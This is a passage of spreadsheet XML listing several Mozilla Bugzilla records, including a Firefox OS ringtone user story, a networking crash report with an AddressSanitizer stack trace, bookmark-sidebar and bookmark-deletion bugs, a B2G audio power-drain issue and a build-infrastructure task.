      </c>
    </row>
    <row r="5218">
      <c r="A5218" t="n">
        <v>891730</v>
      </c>
      <c r="B5218" t="inlineStr">
        <is>
          <t>2013-07-09 22:45:03 -0700</t>
        </is>
      </c>
      <c r="C5218" t="inlineStr">
        <is>
          <t>[User Story] Ringtone Runtime Customization by SIM</t>
        </is>
      </c>
      <c r="D5218" t="inlineStr">
        <is>
          <t>2014-01-14 01:54:30 -0800</t>
        </is>
      </c>
      <c r="E5218" t="n">
        <v>1</v>
      </c>
      <c r="F5218" t="n">
        <v>1</v>
      </c>
      <c r="G5218" t="n">
        <v>6</v>
      </c>
      <c r="H5218" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5218" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J5218" t="inlineStr">
        <is>
          <t>Gaia::System</t>
        </is>
      </c>
      <c r="K5218" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5218" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M5218" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N5218" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5218" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5218" t="inlineStr">
        <is>
          <t>[ucid:System18, FT:systems-fe, KOI:P2][systemsfe]</t>
        </is>
      </c>
      <c r="Q5218" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5218" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5218" t="inlineStr">
        <is>
          <t>1.3 Sprint 3 - 10/25</t>
        </is>
      </c>
      <c r="T5218" t="n">
        <v>1</v>
      </c>
      <c r="U5218" t="n">
        <v>0</v>
      </c>
      <c r="V5218" t="n">
        <v>34</v>
      </c>
      <c r="W5218" t="inlineStr">
        <is>
          <t>User Story:
As an OEM, of the superset of ringtones that I ship with the build, I want to be able to specify which ringtone should be used on the device based on the MNC/MCC setting from the SIM card inserted during the First Run Experience in order to target customizations to locales without needing to use separate builds.
Acceptance Criteria:
1. If a certain ringtone is specified to be used for an MNC/MCC combination, and a SIM card with that MNC/MCC combination is in the device during the First Run Experience, the ringtone used for the incoming phone call tone is that specified ringtone.
2. If no SIM card is inserted during the First Run Experience, the specified default ringtone is used for the incoming phone call tone.
3. If no SIM card is inserted during the First Run Experience, and no default ringtone is specified, the Mozilla defined default ringtone is used for the incoming phone call tone.</t>
        </is>
      </c>
      <c r="X5218" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5219">
      <c r="A5219" t="n">
        <v>1542593</v>
      </c>
      <c r="B5219" t="inlineStr">
        <is>
          <t>2019-04-07 04:43:16 -0700</t>
        </is>
      </c>
      <c r="C5219" t="inlineStr">
        <is>
          <t>PNeckoChild::SendPUDPSocketConstructor called off main thread</t>
        </is>
      </c>
      <c r="D5219" t="inlineStr">
        <is>
          <t>2024-05-30 09:58:07 -0700</t>
        </is>
      </c>
      <c r="E5219" t="n">
        <v>1</v>
      </c>
      <c r="F5219" t="n">
        <v>1</v>
      </c>
      <c r="G5219" t="n">
        <v>3</v>
      </c>
      <c r="H5219" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5219" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5219" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K5219" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5219" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5219" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5219" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5219" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5219" t="inlineStr">
        <is>
          <t>[necko-triaged][post-critsmash-triage][adv-main68+]</t>
        </is>
      </c>
      <c r="Q5219" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5219" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5219" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T5219" t="n">
        <v>1</v>
      </c>
      <c r="U5219" t="n">
        <v>0</v>
      </c>
      <c r="V5219" t="n">
        <v>8</v>
      </c>
      <c r="W5219" t="inlineStr">
        <is>
          <t>I observed a null pointer crash in an asan build, stack trace below.
This looks very similar to #1542160 but that's already marked as fixed. (The crash happened with a build from Apr 1st).
```
==31446==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000001 (pc 0x7f3902c57963 bp 0x7f38e7cebb50 sp 0x7f38e7ceb9c0 T26)
==31446==The signal is caused by a WRITE memory access.
==31446==Hint: address points to the zero page.
    #0 0x7f3902c57962 in mozilla::ipc::IPDLParamTraits&lt;nsIPrincipal&gt;::Write(IPC::Message*, mozilla::ipc::IProtocol*, nsIPrincipal*) /builds/worker/workspace/build/src/dom/ipc/PermissionMessageUtils.cpp:16:3
    #1 0x7f38fc6f27d9 in mozilla::net::PNeckoChild::SendPUDPSocketConstructor(mozilla::net::PUDPSocketChild*, IPC::Principal const&amp;, nsTString&lt;char&gt; const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PNeckoChild.cpp:1099:5
    #2 0x7f39028f120a in mozilla::dom::UDPSocketChild::Bind(nsIUDPSocketInternal*, nsIPrincipal*, nsTSubstring&lt;char&gt; const&amp;, unsigned short, bool, bool, unsigned int, unsigned int, nsIEventTarget*) /builds/worker/workspace/build/src/dom/network/UDPSocketChild.cpp:92:18
    #3 0x7f38fd2513e8 in mozilla::NrUdpSocketIpc::create_i(nsTSubstring&lt;char&gt; const&amp;, unsigned short) /builds/worker/workspace/build/src/media/mtransport/nr_socket_prsock.cpp:1520:7
    #4 0x7f38fd25e2e2 in apply&lt;RefPtr&lt;mozilla::NrUdpSocketIpc&gt;, void (mozilla::NrUdpSocketIpc::*)(const nsTSubstring&lt;char&gt; &amp;, unsigned short), nsTString&lt;char&gt;, unsigned short, 0, 1&gt; /builds/worker/workspace/build/src/media/mtransport/runnable_utils.h:78:5
    #5 0x7f38fd25e2e2 in mozilla::runnable_args_memfn&lt;RefPtr&lt;mozilla::NrUdpSocketIpc&gt;, void (mozilla::NrUdpSocketIpc::*)(nsTSubstring&lt;char&gt; const&amp;, unsigned short), nsTString&lt;char&gt;, unsigned short&gt;::Run() /builds/worker/workspace/build/src/media/mtransport/runnable_utils.h:148
    #6 0x7f38fb29c929 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
    #7 0x7f38fb2a2a18 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:482:10
    #8 0x7f38fc2755ca in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:303:20
    #9 0x7f38fc1a718f in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #10 0x7f38fc1a718f in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #11 0x7f38fc1a718f in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #12 0x7f38fb2968fa in nsThread::ThreadFunc(void*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:454:11
    #13 0x7f3912dd55ad in _pt_root /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #14 0x7f3916004163 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8163)
    #15 0x7f3915be9dee in clone (/lib/x86_64-linux-gnu/libc.so.6+0x11adee)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /builds/worker/workspace/build/src/dom/ipc/PermissionMessageUtils.cpp:16:3 in mozilla::ipc::IPDLParamTraits&lt;nsIPrincipal&gt;::Write(IPC::Message*, mozilla::ipc::IProtocol*, nsIPrincipal*)
Thread T26 (mtransport) created by T6 (Socket Thread) here:
    #0 0x5583451e229d in pthread_create /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:210:3
    #1 0x7f3912dc7613 in _PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:433:14
    #2 0x7f3912db109e in PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:518:12
    #3 0x7f38fb298c19 in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:661:8
    #4 0x7f38fb2a1b60 in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /builds/worker/workspace/build/src/xpcom/threads/nsThreadManager.cpp:416:12
    #5 0x7f38fb2a58b9 in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, nsIRunnable*, unsigned int) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:135:57
    #6 0x7f38fd25cec2 in mozilla::SingletonThreadHolder::AddUse() /builds/worker/workspace/build/src/media/mtransport/nr_socket_prsock.cpp:214:21
    #7 0x7f38fd24de6f in GetIOThreadAndAddUse_s /builds/worker/workspace/build/src/media/mtransport/nr_socket_prsock.cpp:262:12
    #8 0x7f38fd24de6f in mozilla::NrUdpSocketIpc::NrUdpSocketIpc() /builds/worker/workspace/build/src/media/mtransport/nr_socket_prsock.cpp:1086
    #9 0x7f38fd25c2c0 in mozilla::NrSocketBase::CreateSocket(nr_transport_addr_*, RefPtr&lt;mozilla::NrSocketBase&gt;*, std::shared_ptr&lt;mozilla::NrSocketProxyConfig&gt; const&amp;) /builds/worker/workspace/build/src/media/mtransport/nr_socket_prsock.cpp:2106:21
    #10 0x7f38fd28629c in nr_socket_local_create /builds/worker/workspace/build/src/media/mtransport/nricectx.cpp:1132:7
    #11 0x7f3907236ba2 in nr_socket_factory_create_socket /builds/worker/workspace/build/src/media/mtransport/third_party/nICEr/src/net/nr_socket.c:185:12
    #12 0x7f3907236ba2 in nr_ice_get_default_address /builds/worker/workspace/build/src/media/mtransport/third_party/nICEr/src/ice/ice_ctx.c:640
    #13 0x7f3907236ba2 in nr_ice_get_default_local_address /builds/worker/workspace/build/src/media/mtransport/third_party/nICEr/src/ice/ice_ctx.c:661
    #14 0x7f3907235f64 in nr_ice_set_local_addresses /builds/worker/workspace/build/src/media/mtransport/third_party/nICEr/src/ice/ice_ctx.c:744:11
    #15 0x7f38fd278a6b in mozilla::NrIceCtx::SetStunAddrs(nsTArray&lt;mozilla::NrIceStunAddr&gt; const&amp;) /builds/worker/workspace/build/src/media/mtransport/nricectx.cpp:558:3
    #16 0x7f38fd017409 in mozilla::MediaTransportHandlerSTS::StartIceGathering(bool, nsTArray&lt;mozilla::NrIceStunAddr&gt; const&amp;) /builds/worker/workspace/build/src/media/webrtc/signaling/src/peerconnection/MediaTransportHandler.cpp:572:14
    #17 0x7f38fd10eaa9 in apply&lt;RefPtr&lt;mozilla::PeerConnectionMedia&gt;, void (mozilla::PeerConnectionMedia::*)(bool), bool, 0&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mtransport/runnable_utils.h:78:5
    #18 0x7f38fd10eaa9 in mozilla::runnable_args_memfn&lt;RefPtr&lt;mozilla::PeerConnectionMedia&gt;, void (mozilla::PeerConnectionMedia::*)(bool), bool&gt;::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/mtransport/runnable_utils.h:148
    #19 0x7f38fb29c929 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
    #20 0x7f38fb2a2a18 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:482:10
    #21 0x7f38fb540cd4 in mozilla::net::nsSocketTransportService::Run() /builds/worker/workspace/build/src/netwerk/base/nsSocketTransportService2.cpp:1013:11
    #22 0x7f38fb542e7c in non-virtual thunk to mozilla::net::nsSocketTransportService::Run() /builds/worker/workspace/build/src/netwerk/base/nsSocketTransportService2.cpp
    #23 0x7f38fb29c929 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
    #24 0x7f38fb2a2a18 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:482:10
    #25 0x7f38fc2755ca in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:303:20
    #26 0x7f38fc1a718f in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #27 0x7f38fc1a718f in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #28 0x7f38fc1a718f in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #29 0x7f38fb2968fa in nsThread::ThreadFunc(void*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:454:11
    #30 0x7f3912dd55ad in _pt_root /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #31 0x7f3916004163 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8163)
Thread T6 (Socket Thread) created by T0 (Web Content) here:
    #0 0x5583451e229d in pthread_create /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:210:3
    #1 0x7f3912dc7613 in _PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:433:14
    #2 0x7f3912db109e in PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:518:12
    #3 0x7f38fb298c19 in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:661:8
    #4 0x7f38fb2a1b60 in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /builds/worker/workspace/build/src/xpcom/threads/nsThreadManager.cpp:416:12
    #5 0x7f38fb2a58b9 in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, nsIRunnable*, unsigned int) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:135:57
    #6 0x7f38fb53e6bc in NS_NewNamedThread&lt;14&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:71:10
    #7 0x7f38fb53e6bc in mozilla::net::nsSocketTransportService::Init() /builds/worker/workspace/build/src/netwerk/base/nsSocketTransportService2.cpp:609
    #8 0x7f38fb21a948 in mozilla::xpcom::CreateInstanceImpl(mozilla::xpcom::ModuleID, nsISupports*, nsID const&amp;, void**) /builds/worker/workspace/build/src/obj-firefox/xpcom/components/StaticComponents.cpp:8802:7
    #9 0x7f38fb2515cf in CreateInstance /builds/worker/workspace/build/src/xpcom/components/nsComponentManager.cpp:220:46
    #10 0x7f38fb2515cf in nsComponentManagerImpl::GetServiceLocked((anonymous namespace)::MutexLock&amp;, (anonymous namespace)::EntryWrapper&amp;, nsID const&amp;, void**) /builds/worker/workspace/build/src/xpcom/components/nsComponentManager.cpp:1401
    #11 0x7f38fb2461c5 in nsComponentManagerImpl::GetServiceByContractID(char const*, nsID const&amp;, void**) /builds/worker/workspace/build/src/xpcom/components/nsComponentManager.cpp:1588:10
    #12 0x7f38fb25a505 in CallGetService /builds/worker/workspace/build/src/xpcom/components/nsComponentManagerUtils.cpp:61:43
    #13 0x7f38fb25a505 in nsGetServiceByContractIDWithError::operator()(nsID const&amp;, void**) const /builds/worker/workspace/build/src/xpcom/components/nsComponentManagerUtils.cpp:253
    #14 0x7f38fb0c9a9e in nsCOMPtr_base::assign_from_gs_contractid_with_error(nsGetServiceByContractIDWithError const&amp;, nsID const&amp;) /builds/worker/workspace/build/src/xpcom/base/nsCOMPtr.cpp:91:7
    #15 0x7f38fb488e4d in operator= /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:746:5
    #16 0x7f38fb488e4d in InitializeSocketTransportService /builds/worker/workspace/build/src/netwerk/base/nsIOService.cpp:306
    #17 0x7f38fb488e4d in mozilla::net::nsIOService::SetOffline(bool) /builds/worker/workspace/build/src/netwerk/base/nsIOService.cpp:1099
    #18 0x7f38fb48794a in mozilla::net::nsIOService::Init() /builds/worker/workspace/build/src/netwerk/base/nsIOService.cpp:271:3
    #19 0x7f38fb48ad8e in mozilla::net::nsIOService::GetInstance() /builds/worker/workspace/build/src/netwerk/base/nsIOService.cpp:362:9
    #20 0x7f38fb2286ed in mozilla::xpcom::CreateInstanceImpl(mozilla::xpcom::ModuleID, nsISupports*, nsID const&amp;, void**) /builds/worker/workspace/build/src/obj-firefox/xpcom/components/StaticComponents.cpp:10196:48
    #21 0x7f38fb2515cf in CreateInstance /builds/worker/workspace/build/src/xpcom/components/nsComponentManager.cpp:220:46
    #22 0x7f38fb2515cf in nsComponentManagerImpl::GetServiceLocked((anonymous namespace)::MutexLock&amp;, (anonymous namespace)::EntryWrapper&amp;, nsID const&amp;, void**) /builds/worker/workspace/build/src/xpcom/components/nsComponentManager.cpp:1401
    #23 0x7f38fb2461c5 in nsComponentManagerImpl::GetServiceByContractID(char const*, nsID const&amp;, void**) /builds/worker/workspace/build/src/xpcom/components/nsComponentManager.cpp:1588:10
    #24 0x7f38fd415351 in CallGetService&lt;nsIIOService&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsServiceManagerUtils.h:73:10
    #25 0x7f38fd415351 in nsScriptSecurityManager::Init() /builds/worker/workspace/build/src/caps/nsScriptSecurityManager.cpp:1430
    #26 0x7f38fd41627c in nsScriptSecurityManager::InitStatics() /builds/worker/workspace/build/src/caps/nsScriptSecurityManager.cpp:1491:28
    #27 0x7f38fcdc2d48 in nsXPConnect::InitStatics() /builds/worker/workspace/build/src/js/xpconnect/src/nsXPConnect.cpp:135:3
    #28 0x7f38fcd5b188 in xpcModuleCtor() /builds/worker/workspace/build/src/js/xpconnect/src/XPCModule.cpp:11:3
    #29 0x7f39045f7e78 in nsLayoutModuleInitialize() /builds/worker/workspace/build/src/layout/build/nsLayoutModule.cpp:108:7
    #30 0x7f38fb247335 in nsComponentManagerImpl::Init() /builds/worker/workspace/build/src/xpcom/components/nsComponentManager.cpp:535:5
    #31 0x7f38fb2f3ba9 in NS_InitXPCOM /builds/worker/workspace/build/src/xpcom/build/XPCOMInit.cpp:466:51
    #32 0x7f3907117fde in XRE_InitEmbedding2(nsIFile*, nsIFile*, nsIDirectoryServiceProvider*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:196:8
    #33 0x7f38fc28048d in mozilla::ipc::ScopedXREEmbed::Start() /builds/worker/workspace/build/src/ipc/glue/ScopedXREEmbed.cpp
    #34 0x7f3902c2fcd5 in mozilla::dom::ContentProcess::Init(int, char**) /builds/worker/workspace/build/src/dom/ipc/ContentProcess.cpp:188:13
    #35 0x7f3907118ae8 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:732:21
    #36 0x55834522c404 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #37 0x55834522c404 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:263
    #38 0x7f3915af309a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2409a)
```</t>
        </is>
      </c>
      <c r="X5219" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5220">
      <c r="A5220" t="n">
        <v>424444</v>
      </c>
      <c r="B5220" t="inlineStr">
        <is>
          <t>2008-03-21 15:49:02 -0700</t>
        </is>
      </c>
      <c r="C5220" t="inlineStr">
        <is>
          <t>Sidebar bookmarks folders do not expand when reopening the sidebar</t>
        </is>
      </c>
      <c r="D5220" t="inlineStr">
        <is>
          <t>2010-12-17 06:17:02 -0800</t>
        </is>
      </c>
      <c r="E5220" t="n">
        <v>1</v>
      </c>
      <c r="F5220" t="n">
        <v>1</v>
      </c>
      <c r="G5220" t="n">
        <v>2</v>
      </c>
      <c r="H5220" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5220" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5220" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K5220" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5220" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5220" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5220" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5220" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5220" t="inlineStr">
        <is>
          <t>[has patch][has reviews][has approval]</t>
        </is>
      </c>
      <c r="Q5220" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5220" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5220" t="inlineStr">
        <is>
          <t>Firefox 3 beta5</t>
        </is>
      </c>
      <c r="T5220" t="n">
        <v>1</v>
      </c>
      <c r="U5220" t="n">
        <v>0</v>
      </c>
      <c r="V5220" t="n">
        <v>35</v>
      </c>
      <c r="W5220" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b5pre) Gecko/2008032103 Firefox/3.0b5pre
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b5pre) Gecko/2008032103 Firefox/3.0b5pre
If you open the sidebar after first starting Minefield the bookmark folders will expand or collapse.  But if you close the sidebar you can no longer expand the bookmark folders.  This is true with a new or old profile.
I have isolated the problem to build 20080321_0812_firefox-3.0b5pre.en-US.win32.
Everything was fine with build 20080321_0537_firefox-3.0b5pre.en-US.win32.
Reproducible: Always
Steps to Reproduce:
1. Start Firefox and open sidebar. Bookmark folders expand OK. 
2. Close sidebar and reopen it. Now bookmark folders do not expand. 
3.
Actual Results:  
Bookmark folders do no collapse or expand.
Expected Results:  
Bookmark folders should expand and collapse.
As noted above, this is true with a new or old profile.</t>
        </is>
      </c>
      <c r="X5220" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5221">
      <c r="A5221" t="n">
        <v>30710</v>
      </c>
      <c r="B5221" t="inlineStr">
        <is>
          <t>2000-03-06 11:55:07 -0800</t>
        </is>
      </c>
      <c r="C5221" t="inlineStr">
        <is>
          <t>deleting a bookmark crashes on linux</t>
        </is>
      </c>
      <c r="D5221" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E5221" t="n">
        <v>1</v>
      </c>
      <c r="F5221" t="n">
        <v>1</v>
      </c>
      <c r="G5221" t="n">
        <v>2</v>
      </c>
      <c r="H5221" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5221" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J5221" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K5221" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5221" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5221" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5221" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5221" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5221" t="inlineStr">
        <is>
          <t>[PDT+] FIX IN HAND; reviewing and testing ongoing (relative of bug #21006)</t>
        </is>
      </c>
      <c r="Q5221" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5221" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5221" t="inlineStr">
        <is>
          <t>M14</t>
        </is>
      </c>
      <c r="T5221" t="n">
        <v>1</v>
      </c>
      <c r="U5221" t="n">
        <v>0</v>
      </c>
      <c r="V5221" t="n">
        <v>22</v>
      </c>
      <c r="W5221" t="inlineStr">
        <is>
          <t>open managing bookmarks window.
select a bookmark.
edit-&gt;delete bookmark
select `ok'
Result: app crash.</t>
        </is>
      </c>
      <c r="X5221" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5222">
      <c r="A5222" t="n">
        <v>952893</v>
      </c>
      <c r="B5222" t="inlineStr">
        <is>
          <t>2013-12-22 21:44:41 -0800</t>
        </is>
      </c>
      <c r="C5222" t="inlineStr">
        <is>
          <t>[B2G] AudioStream (from AudioDestinationNode) Continues to Write Silent Samples until Killing the Dialer App</t>
        </is>
      </c>
      <c r="D5222" t="inlineStr">
        <is>
          <t>2014-08-12 20:05:22 -0700</t>
        </is>
      </c>
      <c r="E5222" t="n">
        <v>1</v>
      </c>
      <c r="F5222" t="n">
        <v>1</v>
      </c>
      <c r="G5222" t="n">
        <v>3</v>
      </c>
      <c r="H5222" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5222" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5222" t="inlineStr">
        <is>
          <t>Web Audio</t>
        </is>
      </c>
      <c r="K5222" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5222" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M5222" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N5222" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5222" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5222" t="inlineStr">
        <is>
          <t>[c=power p= s= u=1.3] [CR 595623] [CR 608536] [CR  606932]</t>
        </is>
      </c>
      <c r="Q5222" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5222" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5222" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T5222" t="n">
        <v>1</v>
      </c>
      <c r="U5222" t="n">
        <v>0</v>
      </c>
      <c r="V5222" t="n">
        <v>83</v>
      </c>
      <c r="W5222" t="inlineStr">
        <is>
          <t>Device: Inari
Build: Gecko : HG changeset:   159455:85196889c598
       Gaia : e2e7add56f545f2086ab15525ba20b111e5e386f
STR
1. Launch dialer app.
2. No matter dialer app is on foreground or background.
Expected
There is no any PCM data output to audio backend if user didn't press the key.
Actual
There is always silent PCM data output to backend.
Impact
1. This will prevent device from going to deep suspend mode. The normal sleep current will be about 2mA without SIM card attached but it will be more then 40mA in this case.
2. Also impact the idle current from about 150mA to 160mA.
Additional Notes</t>
        </is>
      </c>
      <c r="X5222" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5223">
      <c r="A5223" t="n">
        <v>422206</v>
      </c>
      <c r="B5223" t="inlineStr">
        <is>
          <t>2008-03-11 12:57:52 -0700</t>
        </is>
      </c>
      <c r="C5223" t="inlineStr">
        <is>
          <t>Setup Windows Mobile trunk tinderbox</t>
        </is>
      </c>
      <c r="D5223" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5223" t="n">
        <v>1</v>
      </c>
      <c r="F5223" t="n">
        <v>1</v>
      </c>
      <c r="G5223" t="n">
        <v>5</v>
      </c>
      <c r="H5223" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5223" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5223" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5223" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5223" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5223" t="inlineStr">
        <is>
          <t>Windows Mobile 6 Professional</t>
        </is>
      </c>
      <c r="N5223" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5223" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5223" t="inlineStr"/>
      <c r="Q5223" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5223" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5223" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5223" t="n">
        <v>1</v>
      </c>
      <c r="U5223" t="n">
        <v>0</v>
      </c>
      <c r="V5223" t="n">
        <v>51</v>
      </c>
      <c r="W5223" t="inlineStr">
        <is>
          <t>I will set up temp tinderbox to work out the process.</t>
        </is>
      </c>
      <c r="X5223" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5224">
      <c r="A5224" t="n">
        <v>290677</v>
      </c>
      <c r="B5224" t="inlineStr">
        <is>
          <t>2005-04-17 05:06:07 -0700</t>
        </is>
      </c>
